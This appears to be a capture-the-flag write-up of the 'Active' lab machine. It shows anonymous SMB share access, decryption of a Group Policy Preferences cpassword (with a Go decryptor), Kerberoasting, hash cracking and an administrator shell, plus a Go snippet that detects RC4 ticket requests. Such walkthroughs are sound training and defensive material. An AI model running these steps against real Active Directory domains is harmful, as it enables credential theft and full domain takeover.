Active Write-Up


Intro


If you want to start your quest for SMB share mastery, this is the machine to try. Pretty much everything required to own this machine comes down to abusing an open SMB share. Very fun and lots to learn. Give the Notes section at the bottom of this document a quick read and add the information to your own notes; don't lose hours of your life to Impacket like I did!

User


Starting with an Nmap scan:

[felixm@blackbear ~]$ nmap -sV -sC 10.10.10.100

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-20 14:40:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 48s
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-20T14:41:33
|_  start_date: 2022-04-20T14:38:44

Lots of ports are open, but port 389 (LDAP) tells me this is likely a Domain Controller. Going through the low-hanging fruit, I ran rpcclient and got nothing, then SMBMap, which found the following:

[felixm@blackbear ~]$ python3 smbmap.py  -H 10.10.10.100

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                     https://github.com/ShawnDEvans/smbmap

                                                                                                    
[+] IP: 10.10.10.100:445        Name: active.htb                Status: Authenticated
	Disk                                                    Permissions     Comment
	----                                                    -----------     -------
	ADMIN$                                                  NO ACCESS       Remote Admin
	C$                                                      NO ACCESS       Default share
	IPC$                                                    NO ACCESS       Remote IPC
	NETLOGON                                                NO ACCESS       Logon server share 
	Replication                                             READ ONLY
	SYSVOL                                                  NO ACCESS       Logon server share

SMB allows anonymous (null session) authentication, and we can see there is a read-only share called "Replication". Let's connect and look at its contents:

[felixm@blackbear ~]$ smbclient \\\\10.10.10.100\\Replication -U '' -N

smb: \> recurse on
smb: \> ls
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

\active.htb
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

\active.htb\DfsrPrivate
  ConflictAndDeleted                  D        0  Wed Jul 18 14:51:30 2018
  Deleted                             D        0  Wed Jul 18 14:51:30 2018
  Installing                          D        0  Wed Jul 18 14:51:30 2018

\active.htb\Policies
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 06:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 06:37:44 2018

\active.htb\scripts

\active.htb\DfsrPrivate\ConflictAndDeleted

\active.htb\DfsrPrivate\Deleted

\active.htb\DfsrPrivate\Installing

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
  GPT.INI                             A       23  Wed Jul 18 16:46:06 2018
  Group Policy                        D        0  Sat Jul 21 06:37:44 2018
  MACHINE                             D        0  Sat Jul 21 06:37:44 2018
  USER                                D        0  Wed Jul 18 14:49:12 2018

\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
  GPT.INI                             A       22  Wed Jul 18 14:49:12 2018
  MACHINE                             D        0  Sat Jul 21 06:37:44 2018
  USER                                D        0  Wed Jul 18 14:49:12 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
  GPE.INI                             A      119  Wed Jul 18 16:46:06 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
  Microsoft                           D        0  Sat Jul 21 06:37:44 2018
  Preferences                         D        0  Sat Jul 21 06:37:44 2018
  Registry.pol                        A     2788  Wed Jul 18 14:53:45 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER

\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
  Microsoft                           D        0  Sat Jul 21 06:37:44 2018

\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
  Windows NT                          D        0  Sat Jul 21 06:37:44 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
  Groups                              D        0  Sat Jul 21 06:37:44 2018

\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
  Windows NT                          D        0  Sat Jul 21 06:37:44 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
  SecEdit                             D        0  Sat Jul 21 06:37:44 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
  SecEdit                             D        0  Sat Jul 21 06:37:44 2018

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
  GptTmpl.inf                         A     1098  Wed Jul 18 14:49:12 2018

\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
  GptTmpl.inf                         A     3722  Wed Jul 18 14:49:12 2018

5217023 blocks of size 4096. 228638 blocks available

This looks like a copy of the SYSVOL folder on the DC. There are potentially some interesting files we can extract from SYSVOL; the one that instantly jumps out at me is Groups.xml, a Group Policy Preferences file that can sometimes contain credentials. Let's pull it back and check the contents:

smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> recurse off

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
[felixm@blackbear ~]$ cat Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User >
</Groups>

Looks like we have credentials for an account called "SVC_TGS". Just looking at the name, I'm assuming this is a Ticket Granting System account? I tried passing the hash and got nothing, so let's try to get the clear-text password. Passwords set using Group Policy Preferences are encrypted with an AES key that Microsoft itself published, and a program called gpp-decrypt will do all the hard work for us:

[felixm@blackbear ~]$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

Nice! We now have clear-text credentials: SVC_TGS:GPPstillStandingStrong2k18. I tried to remote in using Evil-WinRM but no dice. Looking back at the anonymous SMB enumeration, there were a few shares with "NO ACCESS", so let's authenticate as "SVC_TGS" and see if we gain access to further information. I looked around and couldn't find anything of use (other than the user.txt flag).
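To show what gpp-decrypt is actually doing, and to give defenders a way to audit their own SYSVOL for cpassword values left behind from before MS14-025, here is an added Go implementation of the same decryption (my code, not part of the original write-up or of gpp-decrypt). It only assumes the published GPP key; the cpassword it feeds in is the one from the Groups.xml above.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// AES-256 key Microsoft published on MSDN for GPP cpassword fields; anyone who can read SYSVOL can use it.
var gppKey, _ = hex.DecodeString("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

// DecryptCPassword undoes the GPP scheme: base64 (stored without '=' padding) -> AES-256-CBC with a
// zero IV -> strip PKCS#7 padding -> UTF-16LE text.
func DecryptCPassword(cpassword string) (string, error) {
	ct, err := base64.RawStdEncoding.DecodeString(strings.TrimRight(cpassword, "="))
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("cpassword is not base64 of whole AES blocks")
	}
	block, _ := aes.NewCipher(gppKey) // key length is fixed at 32 bytes, so this cannot fail
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize {
		return "", errors.New("bad PKCS#7 padding: wrong key or corrupt value")
	}
	units := make([]uint16, (len(pt)-pad)/2) // UTF-16LE code units
	for i := range units {
		units[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(units)), nil
}

func main() {
	// cpassword attribute copied from the Groups.xml pulled off the Replication share
	pw, err := DecryptCPassword("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ")
	if err != nil {
		fmt.Println("decrypt failed:", err)
		return
	}
	fmt.Println("SVC_TGS:", pw)
}
```

In an audit you would run DecryptCPassword over every cpassword attribute found under \\<domain>\SYSVOL\...\Preferences\ (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml) and remove any item that still carries one.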

Root


Since the name of this user is "SVC_TGS", it suggests we can perform a Kerberoast attack. We can try this using Impacket's GetUserSPNs.py script:

[felixm@blackbear ~]$ sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-04-20 20:31:43.861752             

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2862ff74f9fa8157dd6ab35fd8275baa$[rest of the hash omitted]

Now we have a TGS hash to crack for the Administrator's password:

[felixm@blackbear ~]$ john hash.txt --wordlist=~/Downloads/rockyou.txt

Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])

Ticketmaster1968 (?)   

1g 0:00:00:03 DONE (2022-04-21 08:54) 0.2793g/s 2943Kp/s 2943Kc/s 2943KC/s
Session completed.

We now have the credentials Administrator:Ticketmaster1968. We can try to log in remotely with these using Impacket's wmiexec.py:

[felixm@blackbear ~]$ python3 wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.25.dev1+20220420.133736.116ec395 - Copyright 2021 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>whoami
active\administrator
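From the blue-team side, the GetUserSPNs request above leaves a clear trace on the DC: a Kerberos service ticket request (event 4769) with RC4 encryption (etype 0x17, the "23" in the $krb5tgs$23$ hash) for a user account's SPN. This added Go snippet (my code, not part of the original write-up) runs that check over a few constructed, flattened 4769/4768 event lines; the field names match the 4769 EventData, but the lines and the 10.10.14.5 client address are made up for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Constructed events flattened to key=value pairs (not real DC logs). The second line is what the
// GetUserSPNs run above would produce: SVC_TGS asking for an RC4 ticket to the Administrator SPN.
const sampleEvents = `EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.5
EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.10.100
EventID=4768 TargetUserName=SVC_TGS ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5`

// parseEvent turns one flattened event line into a field map.
func parseEvent(line string) map[string]string {
	ev := map[string]string{}
	for _, kv := range strings.Fields(line) {
		if parts := strings.SplitN(kv, "=", 2); len(parts) == 2 {
			ev[parts[0]] = parts[1]
		}
	}
	return ev
}

// SuspectKerberoast returns a finding for every 4769 event that requests an RC4 (etype 0x17)
// service ticket for a user account's SPN. krbtgt and computer accounts ($) are skipped because
// some legitimate clients still use RC4 for those; a user-account SPN served with RC4 is exactly
// what a Kerberoasting tool asks for, since that ticket cracks fastest offline.
func SuspectKerberoast(events string) []string {
	var findings []string
	for _, line := range strings.Split(events, "\n") {
		ev := parseEvent(line)
		svc := ev["ServiceName"]
		if ev["EventID"] != "4769" || ev["TicketEncryptionType"] != "0x17" {
			continue
		}
		if strings.EqualFold(svc, "krbtgt") || strings.HasSuffix(svc, "$") {
			continue
		}
		findings = append(findings, fmt.Sprintf("%s requested an RC4 service ticket for %s from %s",
			ev["TargetUserName"], svc, ev["IpAddress"]))
	}
	return findings
}

func main() {
	for _, f := range SuspectKerberoast(sampleEvents) {
		fmt.Println("[!]", f)
	}
}
```

The fix that makes the finding go away is the same one that kills the attack: a long random password on the service account and AES-only Kerberos encryption for it, so the RC4 request is refused.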

Notes


Ok... Rage mode for a second... Who the fuck thought this was an OK error message for Impacket's GetUserSPNs script:

[-] CCache file is not found. Skipping...
[-] 'NoneType' object has no attribute 'getCredential'

So to start with, is CCache a file on the target machine that is not there? Is this a local file? I didn't know. After looking around a bunch, I found a file called ccache.py in impacket/impacket/krb5. I rightly assumed that there was some sort of issue with Impacket and downloaded older versions, googled errors, etc. I lost hours and hours of my life to this until I realized it was a Linux package I needed to install... HOW ABOUT AN ERROR MESSAGE LIKE "Ccache package not found, check CCache is installed"... Absolutely unreal.